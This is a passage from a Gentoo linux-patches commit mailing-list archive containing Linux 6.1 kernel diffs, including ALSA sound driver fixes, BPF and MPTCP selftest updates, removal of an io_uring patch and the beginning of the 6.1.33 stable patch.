+-	err = snd_ctl_add(ice->card, kctl = snd_ctl_new1(&snd_ice1712_spdif_maskc, ice));
++	err = snd_ctl_add(ice->card, kctl);
+ 	if (err < 0)
+ 		return err;
++	kctl = snd_ctl_new1(&snd_ice1712_spdif_maskp, ice);
+ 	kctl->id.device = ice->pcm_pro->device;
+-	err = snd_ctl_add(ice->card, kctl = snd_ctl_new1(&snd_ice1712_spdif_maskp, ice));
++	err = snd_ctl_add(ice->card, kctl);
+ 	if (err < 0)
+ 		return err;
++	kctl = snd_ctl_new1(&snd_ice1712_spdif_stream, ice);
+ 	kctl->id.device = ice->pcm_pro->device;
+-	err = snd_ctl_add(ice->card, kctl = snd_ctl_new1(&snd_ice1712_spdif_stream, ice));
++	err = snd_ctl_add(ice->card, kctl);
+ 	if (err < 0)
+ 		return err;
+-	kctl->id.device = ice->pcm_pro->device;
+ 	ice->spdif.stream_ctl = kctl;
+ 	return 0;
+ }
+diff --git a/sound/pci/ice1712/ice1724.c b/sound/pci/ice1712/ice1724.c
+index 6fab2ad85bbec..1dc776acd637c 100644
+--- a/sound/pci/ice1712/ice1724.c
++++ b/sound/pci/ice1712/ice1724.c
+@@ -2392,23 +2392,27 @@ static int snd_vt1724_spdif_build_controls(struct snd_ice1712 *ice)
+ 	if (err < 0)
+ 		return err;
+ 
+-	err = snd_ctl_add(ice->card, kctl = snd_ctl_new1(&snd_vt1724_spdif_default, ice));
++	kctl = snd_ctl_new1(&snd_vt1724_spdif_default, ice);
++	kctl->id.device = ice->pcm->device;
++	err = snd_ctl_add(ice->card, kctl);
+ 	if (err < 0)
+ 		return err;
++	kctl = snd_ctl_new1(&snd_vt1724_spdif_maskc, ice);
+ 	kctl->id.device = ice->pcm->device;
+-	err = snd_ctl_add(ice->card, kctl = snd_ctl_new1(&snd_vt1724_spdif_maskc, ice));
++	err = snd_ctl_add(ice->card, kctl);
+ 	if (err < 0)
+ 		return err;
++	kctl = snd_ctl_new1(&snd_vt1724_spdif_maskp, ice);
+ 	kctl->id.device = ice->pcm->device;
+-	err = snd_ctl_add(ice->card, kctl = snd_ctl_new1(&snd_vt1724_spdif_maskp, ice));
++	err = snd_ctl_add(ice->card, kctl);
+ 	if (err < 0)
+ 		return err;
+-	kctl->id.device = ice->pcm->device;
+ #if 0 /* use default only */
+-	err = snd_ctl_add(ice->card, kctl = snd_ctl_new1(&snd_vt1724_spdif_stream, ice));
++	kctl = snd_ctl_new1(&snd_vt1724_spdif_stream, ice);
++	kctl->id.device = ice->pcm->device;
++	err = snd_ctl_add(ice->card, kctl);
+ 	if (err < 0)
+ 		return err;
+-	kctl->id.device = ice->pcm->device;
+ 	ice->spdif.stream_ctl = kctl;
+ #endif
+ 	return 0;
+diff --git a/sound/pci/ymfpci/ymfpci_main.c b/sound/pci/ymfpci/ymfpci_main.c
+index b492c32ce0704..f629b3956a69d 100644
+--- a/sound/pci/ymfpci/ymfpci_main.c
++++ b/sound/pci/ymfpci/ymfpci_main.c
+@@ -1827,20 +1827,20 @@ int snd_ymfpci_mixer(struct snd_ymfpci *chip, int rear_switch)
+ 	if (snd_BUG_ON(!chip->pcm_spdif))
+ 		return -ENXIO;
+ 	kctl = snd_ctl_new1(&snd_ymfpci_spdif_default, chip);
++	kctl->id.device = chip->pcm_spdif->device;
+ 	err = snd_ctl_add(chip->card, kctl);
+ 	if (err < 0)
+ 		return err;
+-	kctl->id.device = chip->pcm_spdif->device;
+ 	kctl = snd_ctl_new1(&snd_ymfpci_spdif_mask, chip);
++	kctl->id.device = chip->pcm_spdif->device;
+ 	err = snd_ctl_add(chip->card, kctl);
+ 	if (err < 0)
+ 		return err;
+-	kctl->id.device = chip->pcm_spdif->device;
+ 	kctl = snd_ctl_new1(&snd_ymfpci_spdif_stream, chip);
++	kctl->id.device = chip->pcm_spdif->device;
+ 	err = snd_ctl_add(chip->card, kctl);
+ 	if (err < 0)
+ 		return err;
+-	kctl->id.device = chip->pcm_spdif->device;
+ 	chip->spdif_pcm_ctl = kctl;
+ 
+ 	/* direct recording source */
+diff --git a/sound/soc/codecs/wsa881x.c b/sound/soc/codecs/wsa881x.c
+index 046843b57b038..264ec05a3c675 100644
+--- a/sound/soc/codecs/wsa881x.c
++++ b/sound/soc/codecs/wsa881x.c
+@@ -648,7 +648,6 @@ static struct regmap_config wsa881x_regmap_config = {
+ 	.readable_reg = wsa881x_readable_register,
+ 	.reg_format_endian = REGMAP_ENDIAN_NATIVE,
+ 	.val_format_endian = REGMAP_ENDIAN_NATIVE,
+-	.can_multi_write = true,
+ };
+ 
+ enum {
+diff --git a/sound/soc/codecs/wsa883x.c b/sound/soc/codecs/wsa883x.c
+index 6e9a64c5948e2..b152f4e5c4f2b 100644
+--- a/sound/soc/codecs/wsa883x.c
++++ b/sound/soc/codecs/wsa883x.c
+@@ -950,7 +950,6 @@ static struct regmap_config wsa883x_regmap_config = {
+ 	.writeable_reg = wsa883x_writeable_register,
+ 	.reg_format_endian = REGMAP_ENDIAN_NATIVE,
+ 	.val_format_endian = REGMAP_ENDIAN_NATIVE,
+-	.can_multi_write = true,
+ 	.use_single_read = true,
+ };
+ 
+diff --git a/sound/soc/generic/simple-card-utils.c b/sound/soc/generic/simple-card-utils.c
+index be69bbc47f813..8811321717fbb 100644
+--- a/sound/soc/generic/simple-card-utils.c
++++ b/sound/soc/generic/simple-card-utils.c
+@@ -335,7 +335,7 @@ int asoc_simple_startup(struct snd_pcm_substream *substream)
+ 		}
+ 		ret = snd_pcm_hw_constraint_minmax(substream->runtime, SNDRV_PCM_HW_PARAM_RATE,
+ 			fixed_rate, fixed_rate);
+-		if (ret)
++		if (ret < 0)
+ 			goto codec_err;
+ 	}
+ 
+diff --git a/sound/soc/mediatek/mt8195/mt8195-afe-clk.c b/sound/soc/mediatek/mt8195/mt8195-afe-clk.c
+index 9ca2cb8c8a9c2..f35318ae07392 100644
+--- a/sound/soc/mediatek/mt8195/mt8195-afe-clk.c
++++ b/sound/soc/mediatek/mt8195/mt8195-afe-clk.c
+@@ -410,11 +410,6 @@ int mt8195_afe_init_clock(struct mtk_base_afe *afe)
+ 	return 0;
+ }
+ 
+-void mt8195_afe_deinit_clock(struct mtk_base_afe *afe)
+-{
+-	mt8195_audsys_clk_unregister(afe);
+-}
+-
+ int mt8195_afe_enable_clk(struct mtk_base_afe *afe, struct clk *clk)
+ {
+ 	int ret;
+diff --git a/sound/soc/mediatek/mt8195/mt8195-afe-clk.h b/sound/soc/mediatek/mt8195/mt8195-afe-clk.h
+index 40663e31becd1..a08c0ee6c8602 100644
+--- a/sound/soc/mediatek/mt8195/mt8195-afe-clk.h
++++ b/sound/soc/mediatek/mt8195/mt8195-afe-clk.h
+@@ -101,7 +101,6 @@ int mt8195_afe_get_mclk_source_clk_id(int sel);
+ int mt8195_afe_get_mclk_source_rate(struct mtk_base_afe *afe, int apll);
+ int mt8195_afe_get_default_mclk_source_by_rate(int rate);
+ int mt8195_afe_init_clock(struct mtk_base_afe *afe);
+-void mt8195_afe_deinit_clock(struct mtk_base_afe *afe);
+ int mt8195_afe_enable_clk(struct mtk_base_afe *afe, struct clk *clk);
+ void mt8195_afe_disable_clk(struct mtk_base_afe *afe, struct clk *clk);
+ int mt8195_afe_prepare_clk(struct mtk_base_afe *afe, struct clk *clk);
+diff --git a/sound/soc/mediatek/mt8195/mt8195-afe-pcm.c b/sound/soc/mediatek/mt8195/mt8195-afe-pcm.c
+index 72b2c6d629b93..03dabc056b916 100644
+--- a/sound/soc/mediatek/mt8195/mt8195-afe-pcm.c
++++ b/sound/soc/mediatek/mt8195/mt8195-afe-pcm.c
+@@ -3253,18 +3253,13 @@ err_pm_put:
+ 	return ret;
+ }
+ 
+-static int mt8195_afe_pcm_dev_remove(struct platform_device *pdev)
++static void mt8195_afe_pcm_dev_remove(struct platform_device *pdev)
+ {
+-	struct mtk_base_afe *afe = platform_get_drvdata(pdev);
+-
+ 	snd_soc_unregister_component(&pdev->dev);
+ 
+ 	pm_runtime_disable(&pdev->dev);
+ 	if (!pm_runtime_status_suspended(&pdev->dev))
+ 		mt8195_afe_runtime_suspend(&pdev->dev);
+-
+-	mt8195_afe_deinit_clock(afe);
+-	return 0;
+ }
+ 
+ static const struct of_device_id mt8195_afe_pcm_dt_match[] = {
+@@ -3285,7 +3280,7 @@ static struct platform_driver mt8195_afe_pcm_driver = {
+ 		   .pm = &mt8195_afe_pm_ops,
+ 	},
+ 	.probe = mt8195_afe_pcm_dev_probe,
+-	.remove = mt8195_afe_pcm_dev_remove,
++	.remove_new = mt8195_afe_pcm_dev_remove,
+ };
+ 
+ module_platform_driver(mt8195_afe_pcm_driver);
+diff --git a/sound/soc/mediatek/mt8195/mt8195-audsys-clk.c b/sound/soc/mediatek/mt8195/mt8195-audsys-clk.c
+index e0670e0dbd5b0..38594bc3f2f77 100644
+--- a/sound/soc/mediatek/mt8195/mt8195-audsys-clk.c
++++ b/sound/soc/mediatek/mt8195/mt8195-audsys-clk.c
+@@ -148,6 +148,29 @@ static const struct afe_gate aud_clks[CLK_AUD_NR_CLK] = {
+ 	GATE_AUD6(CLK_AUD_GASRC19, "aud_gasrc19", "top_asm_h", 19),
+ };
+ 
++static void mt8195_audsys_clk_unregister(void *data)
++{
++	struct mtk_base_afe *afe = data;
++	struct mt8195_afe_private *afe_priv = afe->platform_priv;
++	struct clk *clk;
++	struct clk_lookup *cl;
++	int i;
++
++	if (!afe_priv)
++		return;
++
++	for (i = 0; i < CLK_AUD_NR_CLK; i++) {
++		cl = afe_priv->lookup[i];
++		if (!cl)
++			continue;
++
++		clk = cl->clk;
++		clk_unregister_gate(clk);
++
++		clkdev_drop(cl);
++	}
++}
++
+ int mt8195_audsys_clk_register(struct mtk_base_afe *afe)
+ {
+ 	struct mt8195_afe_private *afe_priv = afe->platform_priv;
+@@ -188,27 +211,5 @@ int mt8195_audsys_clk_register(struct mtk_base_afe *afe)
+ 		afe_priv->lookup[i] = cl;
+ 	}
+ 
+-	return 0;
+-}
+-
+-void mt8195_audsys_clk_unregister(struct mtk_base_afe *afe)
+-{
+-	struct mt8195_afe_private *afe_priv = afe->platform_priv;
+-	struct clk *clk;
+-	struct clk_lookup *cl;
+-	int i;
+-
+-	if (!afe_priv)
+-		return;
+-
+-	for (i = 0; i < CLK_AUD_NR_CLK; i++) {
+-		cl = afe_priv->lookup[i];
+-		if (!cl)
+-			continue;
+-
+-		clk = cl->clk;
+-		clk_unregister_gate(clk);
+-
+-		clkdev_drop(cl);
+-	}
++	return devm_add_action_or_reset(afe->dev, mt8195_audsys_clk_unregister, afe);
+ }
+diff --git a/sound/soc/mediatek/mt8195/mt8195-audsys-clk.h b/sound/soc/mediatek/mt8195/mt8195-audsys-clk.h
+index 239d31016ba76..69db2dd1c9e02 100644
+--- a/sound/soc/mediatek/mt8195/mt8195-audsys-clk.h
++++ b/sound/soc/mediatek/mt8195/mt8195-audsys-clk.h
+@@ -10,6 +10,5 @@
+ #define _MT8195_AUDSYS_CLK_H_
+ 
+ int mt8195_audsys_clk_register(struct mtk_base_afe *afe);
+-void mt8195_audsys_clk_unregister(struct mtk_base_afe *afe);
+ 
+ #endif
+diff --git a/tools/testing/selftests/bpf/prog_tests/sockopt_sk.c b/tools/testing/selftests/bpf/prog_tests/sockopt_sk.c
+index 60d952719d275..05d0e07da3942 100644
+--- a/tools/testing/selftests/bpf/prog_tests/sockopt_sk.c
++++ b/tools/testing/selftests/bpf/prog_tests/sockopt_sk.c
+@@ -3,6 +3,7 @@
+ #include "cgroup_helpers.h"
+ 
+ #include <linux/tcp.h>
++#include <linux/netlink.h>
+ #include "sockopt_sk.skel.h"
+ 
+ #ifndef SOL_TCP
+@@ -183,6 +184,33 @@ static int getsetsockopt(void)
+ 		goto err;
+ 	}
+ 
++	/* optval=NULL case is handled correctly */
++
++	close(fd);
++	fd = socket(AF_NETLINK, SOCK_RAW, 0);
++	if (fd < 0) {
++		log_err("Failed to create AF_NETLINK socket");
++		return -1;
++	}
++
++	buf.u32 = 1;
++	optlen = sizeof(__u32);
++	err = setsockopt(fd, SOL_NETLINK, NETLINK_ADD_MEMBERSHIP, &buf, optlen);
++	if (err) {
++		log_err("Unexpected getsockopt(NETLINK_ADD_MEMBERSHIP) err=%d errno=%d",
++			err, errno);
++		goto err;
++	}
++
++	optlen = 0;
++	err = getsockopt(fd, SOL_NETLINK, NETLINK_LIST_MEMBERSHIPS, NULL, &optlen);
++	if (err) {
++		log_err("Unexpected getsockopt(NETLINK_LIST_MEMBERSHIPS) err=%d errno=%d",
++			err, errno);
++		goto err;
++	}
++	ASSERT_EQ(optlen, 8, "Unexpected NETLINK_LIST_MEMBERSHIPS value");
++
+ 	free(big_buf);
+ 	close(fd);
+ 	return 0;
+diff --git a/tools/testing/selftests/bpf/progs/sockopt_sk.c b/tools/testing/selftests/bpf/progs/sockopt_sk.c
+index c8d810010a946..fe1df4cd206eb 100644
+--- a/tools/testing/selftests/bpf/progs/sockopt_sk.c
++++ b/tools/testing/selftests/bpf/progs/sockopt_sk.c
+@@ -32,6 +32,12 @@ int _getsockopt(struct bpf_sockopt *ctx)
+ 	__u8 *optval_end = ctx->optval_end;
+ 	__u8 *optval = ctx->optval;
+ 	struct sockopt_sk *storage;
++	struct bpf_sock *sk;
++
++	/* Bypass AF_NETLINK. */
++	sk = ctx->sk;
++	if (sk && sk->family == AF_NETLINK)
++		return 1;
+ 
+ 	/* Make sure bpf_get_netns_cookie is callable.
+ 	 */
+@@ -131,6 +137,12 @@ int _setsockopt(struct bpf_sockopt *ctx)
+ 	__u8 *optval_end = ctx->optval_end;
+ 	__u8 *optval = ctx->optval;
+ 	struct sockopt_sk *storage;
++	struct bpf_sock *sk;
++
++	/* Bypass AF_NETLINK. */
++	sk = ctx->sk;
++	if (sk && sk->family == AF_NETLINK)
++		return 1;
+ 
+ 	/* Make sure bpf_get_netns_cookie is callable.
+ 	 */
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index c7da2bd7c3286..6be19b1038243 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -851,7 +851,15 @@ do_transfer()
+ 				tk=$(sed -n 's/.*\(token:\)\([[:digit:]]*\).*$/\2/p;q' "$evts_ns1")
+ 				ip netns exec ${listener_ns} ./pm_nl_ctl ann $addr token $tk id $id
+ 				sleep 1
++				sp=$(grep "type:10" "$evts_ns1" |
++				     sed -n 's/.*\(sport:\)\([[:digit:]]*\).*$/\2/p;q')
++				da=$(grep "type:10" "$evts_ns1" |
++				     sed -n 's/.*\(daddr6:\)\([0-9a-f:.]*\).*$/\2/p;q')
++				dp=$(grep "type:10" "$evts_ns1" |
++				     sed -n 's/.*\(dport:\)\([[:digit:]]*\).*$/\2/p;q')
+ 				ip netns exec ${listener_ns} ./pm_nl_ctl rem token $tk id $id
++				ip netns exec ${listener_ns} ./pm_nl_ctl dsf lip "::ffff:$addr" \
++							lport $sp rip $da rport $dp token $tk
+ 			fi
+ 
+ 			counter=$((counter + 1))
+@@ -917,6 +925,7 @@ do_transfer()
+ 				sleep 1
+ 				sp=$(grep "type:10" "$evts_ns2" |
+ 				     sed -n 's/.*\(sport:\)\([[:digit:]]*\).*$/\2/p;q')
++				ip netns exec ${connector_ns} ./pm_nl_ctl rem token $tk id $id
+ 				ip netns exec ${connector_ns} ./pm_nl_ctl dsf lip $addr lport $sp \
+ 									rip $da rport $dp token $tk
+ 			fi
+@@ -2999,7 +3008,7 @@ userspace_tests()
+ 		pm_nl_set_limits $ns1 0 1
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 userspace_1 slow
+ 		chk_join_nr 1 1 1
+-		chk_rm_nr 0 1
++		chk_rm_nr 1 1
+ 	fi
+ }
+ 


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-06-09 12:02 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-06-09 12:02 UTC (permalink / raw
  To: gentoo-commits

commit:     3c90be0a17c6a8daaa7786f407058de578bb1dec
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Jun  9 12:01:57 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Jun  9 12:01:57 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=3c90be0a

Remove redundant patch

Removed:
2100_io-uring-undeprecate-epoll-ctl-support.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                       |  4 ----
 2100_io-uring-undeprecate-epoll-ctl-support.patch | 21 ---------------------
 2 files changed, 25 deletions(-)

diff --git a/0000_README b/0000_README
index 20dddfc3..5b332006 100644
--- a/0000_README
+++ b/0000_README
@@ -187,10 +187,6 @@ Patch:  2000_BT-Check-key-sizes-only-if-Secure-Simple-Pairing-enabled.patch
 From:   https://lore.kernel.org/linux-bluetooth/20190522070540.48895-1-marcel@holtmann.org/raw
 Desc:   Bluetooth: Check key sizes only when Secure Simple Pairing is enabled. See bug #686758
 
-Patch:  2100_io-uring-undeprecate-epoll-ctl-support.patch
-From:   https://patchwork.kernel.org/project/io-uring/patch/20230506095502.13401-1-info@bnoordhuis.nl/
-Desc:   io_uring: undeprecate epoll_ctl support
-
 Patch:  2900_tmp513-Fix-build-issue-by-selecting-CONFIG_REG.patch
 From:   https://bugs.gentoo.org/710790
 Desc:   tmp513 requies REGMAP_I2C to build.  Select it by default in Kconfig. See bug #710790. Thanks to Phil Stracchino

diff --git a/2100_io-uring-undeprecate-epoll-ctl-support.patch b/2100_io-uring-undeprecate-epoll-ctl-support.patch
deleted file mode 100644
index 4c3d3904..00000000
--- a/2100_io-uring-undeprecate-epoll-ctl-support.patch
+++ /dev/null
@@ -1,21 +0,0 @@
-io_uring: undeprecate epoll_ctl support
-
----
- io_uring/epoll.c | 4 ----
- 1 file changed, 4 deletions(-)
-
-diff --git a/io_uring/epoll.c b/io_uring/epoll.c
-index 9aa74d2c80bc..89bff2068a19 100644
---- a/io_uring/epoll.c
-+++ b/io_uring/epoll.c
-@@ -25,10 +25,6 @@ int io_epoll_ctl_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
- {
- 	struct io_epoll *epoll = io_kiocb_to_cmd(req, struct io_epoll);
- 
--	pr_warn_once("%s: epoll_ctl support in io_uring is deprecated and will "
--		     "be removed in a future Linux kernel version.\n",
--		     current->comm);
--
- 	if (sqe->buf_index || sqe->splice_fd_in)
- 		return -EINVAL;
- 


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-06-09 11:29 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-06-09 11:29 UTC (permalink / raw
  To: gentoo-commits

commit:     6a7b67ec1b322cd6ddceee5435358f5f257e15a0
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Jun  9 11:29:39 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Jun  9 11:29:39 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=6a7b67ec

Linux patch 6.1.33

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1032_linux-6.1.33.patch | 7979 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 7983 insertions(+)

diff --git a/0000_README b/0000_README
index a242f865..20dddfc3 100644
--- a/0000_README
+++ b/0000_README
@@ -167,6 +167,10 @@ Patch:  1031_linux-6.1.32.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.32
 
+Patch:  1032_linux-6.1.33.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.33
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1032_linux-6.1.33.patch b/1032_linux-6.1.33.patch
new file mode 100644
index 00000000..d6b27484
--- /dev/null
+++ b/1032_linux-6.1.33.patch
@@ -0,0 +1,7979 @@
+diff --git a/Documentation/devicetree/bindings/iio/adc/renesas,rcar-gyroadc.yaml b/Documentation/devicetree/bindings/iio/adc/renesas,rcar-gyroadc.yaml
+index c115e2e99bd9a..4a7b1385fdc7e 100644
+--- a/Documentation/devicetree/bindings/iio/adc/renesas,rcar-gyroadc.yaml
++++ b/Documentation/devicetree/bindings/iio/adc/renesas,rcar-gyroadc.yaml
+@@ -86,7 +86,7 @@ patternProperties:
+             of the MAX chips to the GyroADC, while MISO line of each Maxim
+             ADC connects to a shared input pin of the GyroADC.
+         enum:
+-          - adi,7476
++          - adi,ad7476
+           - fujitsu,mb88101a
+           - maxim,max1162
+           - maxim,max11100
+diff --git a/Documentation/devicetree/bindings/sound/tas2562.yaml b/Documentation/devicetree/bindings/sound/tas2562.yaml
+index 30f6b029ac085..cb519a4b6e710 100644
+--- a/Documentation/devicetree/bindings/sound/tas2562.yaml
++++ b/Documentation/devicetree/bindings/sound/tas2562.yaml
+@@ -52,7 +52,9 @@ properties:
+     description: TDM TX current sense time slot.
+ 
+   '#sound-dai-cells':
+-    const: 1
++    # The codec has a single DAI, the #sound-dai-cells=<1>; case is left in for backward
++    # compatibility but is deprecated.
++    enum: [0, 1]
+ 
+ required:
+   - compatible
+@@ -69,7 +71,7 @@ examples:
+      codec: codec@4c {
+        compatible = "ti,tas2562";
+        reg = <0x4c>;
+-       #sound-dai-cells = <1>;
++       #sound-dai-cells = <0>;
+        interrupt-parent = <&gpio1>;
+        interrupts = <14>;
+        shutdown-gpios = <&gpio1 15 0>;
+diff --git a/Documentation/devicetree/bindings/sound/tas2770.yaml b/Documentation/devicetree/bindings/sound/tas2770.yaml
+index bc90e72bf7cf9..1859fbe1cdf17 100644
+--- a/Documentation/devicetree/bindings/sound/tas2770.yaml
++++ b/Documentation/devicetree/bindings/sound/tas2770.yaml
+@@ -54,7 +54,9 @@ properties:
+       - 1 # Falling edge
+ 
+   '#sound-dai-cells':
+-    const: 1
++    # The codec has a single DAI, the #sound-dai-cells=<1>; case is left in for backward
++    # compatibility but is deprecated.
++    enum: [0, 1]
+ 
+ required:
+   - compatible
+@@ -71,7 +73,7 @@ examples:
+      codec: codec@41 {
+        compatible = "ti,tas2770";
+        reg = <0x41>;
+-       #sound-dai-cells = <1>;
++       #sound-dai-cells = <0>;
+        interrupt-parent = <&gpio1>;
+        interrupts = <14>;
+        reset-gpio = <&gpio1 15 0>;
+diff --git a/Documentation/devicetree/bindings/sound/tas27xx.yaml b/Documentation/devicetree/bindings/sound/tas27xx.yaml
+index 66a0df8850ea6..079cb6f8d4474 100644
+--- a/Documentation/devicetree/bindings/sound/tas27xx.yaml
++++ b/Documentation/devicetree/bindings/sound/tas27xx.yaml
+@@ -47,7 +47,9 @@ properties:
+     description: TDM TX voltage sense time slot.
+ 
+   '#sound-dai-cells':
+-    const: 1
++    # The codec has a single DAI, the #sound-dai-cells=<1>; case is left in for backward
++    # compatibility but is deprecated.
++    enum: [0, 1]
+ 
+ required:
+   - compatible
+@@ -64,7 +66,7 @@ examples:
+      codec: codec@38 {
+        compatible = "ti,tas2764";
+        reg = <0x38>;
+-       #sound-dai-cells = <1>;
++       #sound-dai-cells = <0>;
+        interrupt-parent = <&gpio1>;
+        interrupts = <14>;
+        reset-gpios = <&gpio1 15 0>;
+diff --git a/Documentation/devicetree/bindings/usb/snps,dwc3.yaml b/Documentation/devicetree/bindings/usb/snps,dwc3.yaml
+index 6d78048c4613e..045fc7a28c45f 100644
+--- a/Documentation/devicetree/bindings/usb/snps,dwc3.yaml
++++ b/Documentation/devicetree/bindings/usb/snps,dwc3.yaml
+@@ -260,7 +260,7 @@ properties:
+     description:
+       High-Speed PHY interface selection between UTMI+ and ULPI when the
+       DWC_USB3_HSPHY_INTERFACE has value 3.
+-    $ref: /schemas/types.yaml#/definitions/uint8
++    $ref: /schemas/types.yaml#/definitions/string
+     enum: [utmi, ulpi]
+ 
+   snps,quirk-frame-length-adjustment:
+diff --git a/Makefile b/Makefile
+index a0c3d8809e93a..6be79c5c934f5 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 32
++SUBLEVEL = 33
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/stm32f7-pinctrl.dtsi b/arch/arm/boot/dts/stm32f7-pinctrl.dtsi
+index 8f37aefa73150..000278ec2c58f 100644
+--- a/arch/arm/boot/dts/stm32f7-pinctrl.dtsi
++++ b/arch/arm/boot/dts/stm32f7-pinctrl.dtsi
+@@ -284,6 +284,88 @@
+ 					slew-rate = <2>;
+ 				};
+ 			};
++
++			can1_pins_a: can1-0 {
++				pins1 {
++					pinmux = <STM32_PINMUX('A', 12, AF9)>; /* CAN1_TX */
++				};
++				pins2 {
++					pinmux = <STM32_PINMUX('A', 11, AF9)>; /* CAN1_RX */
++					bias-pull-up;
++				};
++			};
++
++			can1_pins_b: can1-1 {
++				pins1 {
++					pinmux = <STM32_PINMUX('B', 9, AF9)>; /* CAN1_TX */
++				};
++				pins2 {
++					pinmux = <STM32_PINMUX('B', 8, AF9)>; /* CAN1_RX */
++					bias-pull-up;
++				};
++			};
++
++			can1_pins_c: can1-2 {
++				pins1 {
++					pinmux = <STM32_PINMUX('D', 1, AF9)>; /* CAN1_TX */
++				};
++				pins2 {
++					pinmux = <STM32_PINMUX('D', 0, AF9)>; /* CAN1_RX */
++					bias-pull-up;
++
++				};
++			};
++
++			can1_pins_d: can1-3 {
++				pins1 {
++					pinmux = <STM32_PINMUX('H', 13, AF9)>; /* CAN1_TX */
++				};
++				pins2 {
++					pinmux = <STM32_PINMUX('H', 14, AF9)>; /* CAN1_RX */
++					bias-pull-up;
++
++				};
++			};
++
++			can2_pins_a: can2-0 {
++				pins1 {
++					pinmux = <STM32_PINMUX('B', 6, AF9)>; /* CAN2_TX */
++				};
++				pins2 {
++					pinmux = <STM32_PINMUX('B', 5, AF9)>; /* CAN2_RX */
++					bias-pull-up;
++				};
++			};
++
++			can2_pins_b: can2-1 {
++				pins1 {
++					pinmux = <STM32_PINMUX('B', 13, AF9)>; /* CAN2_TX */
++				};
++				pins2 {
++					pinmux = <STM32_PINMUX('B', 12, AF9)>; /* CAN2_RX */
++					bias-pull-up;
++				};
++			};
++
++			can3_pins_a: can3-0 {
++				pins1 {
++					pinmux = <STM32_PINMUX('A', 15, AF11)>; /* CAN3_TX */
++				};
++				pins2 {
++					pinmux = <STM32_PINMUX('A', 8, AF11)>; /* CAN3_RX */
++					bias-pull-up;
++				};
++			};
++
++			can3_pins_b: can3-1 {
++				pins1 {
++					pinmux = <STM32_PINMUX('B', 4, AF11)>;  /* CAN3_TX */
++				};
++				pins2 {
++					pinmux = <STM32_PINMUX('B', 3, AF11)>; /* CAN3_RX */
++					bias-pull-up;
++				};
++			};
+ 		};
+ 	};
+ };
+diff --git a/arch/arm/kernel/unwind.c b/arch/arm/kernel/unwind.c
+index a37ea6c772cd5..2e6aa5dc15bf3 100644
+--- a/arch/arm/kernel/unwind.c
++++ b/arch/arm/kernel/unwind.c
+@@ -307,6 +307,29 @@ static int unwind_exec_pop_subset_r0_to_r3(struct unwind_ctrl_block *ctrl,
+ 	return URC_OK;
+ }
+ 
++static unsigned long unwind_decode_uleb128(struct unwind_ctrl_block *ctrl)
++{
++	unsigned long bytes = 0;
++	unsigned long insn;
++	unsigned long result = 0;
++
++	/*
++	 * unwind_get_byte() will advance `ctrl` one instruction at a time, so
++	 * loop until we get an instruction byte where bit 7 is not set.
++	 *
++	 * Note: This decodes a maximum of 4 bytes to output 28 bits data where
++	 * max is 0xfffffff: that will cover a vsp increment of 1073742336, hence
++	 * it is sufficient for unwinding the stack.
++	 */
++	do {
++		insn = unwind_get_byte(ctrl);
++		result |= (insn & 0x7f) << (bytes * 7);
++		bytes++;
++	} while (!!(insn & 0x80) && (bytes != sizeof(result)));
++
++	return result;
++}
++
+ /*
+  * Execute the current unwind instruction.
+  */
+@@ -360,7 +383,7 @@ static int unwind_exec_insn(struct unwind_ctrl_block *ctrl)
+ 		if (ret)
+ 			goto error;
+ 	} else if (insn == 0xb2) {
+-		unsigned long uleb128 = unwind_get_byte(ctrl);
++		unsigned long uleb128 = unwind_decode_uleb128(ctrl);
+ 
+ 		ctrl->vrs[SP] += 0x204 + (uleb128 << 2);
+ 	} else {
+diff --git a/arch/arm64/kernel/vdso.c b/arch/arm64/kernel/vdso.c
+index 99ae81ab91a74..6ebb8dea5f09e 100644
+--- a/arch/arm64/kernel/vdso.c
++++ b/arch/arm64/kernel/vdso.c
+@@ -312,7 +312,7 @@ static int aarch32_alloc_kuser_vdso_page(void)
+ 
+ 	memcpy((void *)(vdso_page + 0x1000 - kuser_sz), __kuser_helper_start,
+ 	       kuser_sz);
+-	aarch32_vectors_page = virt_to_page(vdso_page);
++	aarch32_vectors_page = virt_to_page((void *)vdso_page);
+ 	return 0;
+ }
+ 
+diff --git a/arch/arm64/kvm/hyp/include/hyp/switch.h b/arch/arm64/kvm/hyp/include/hyp/switch.h
+index 3330d1b76bdd2..2208d79b18dea 100644
+--- a/arch/arm64/kvm/hyp/include/hyp/switch.h
++++ b/arch/arm64/kvm/hyp/include/hyp/switch.h
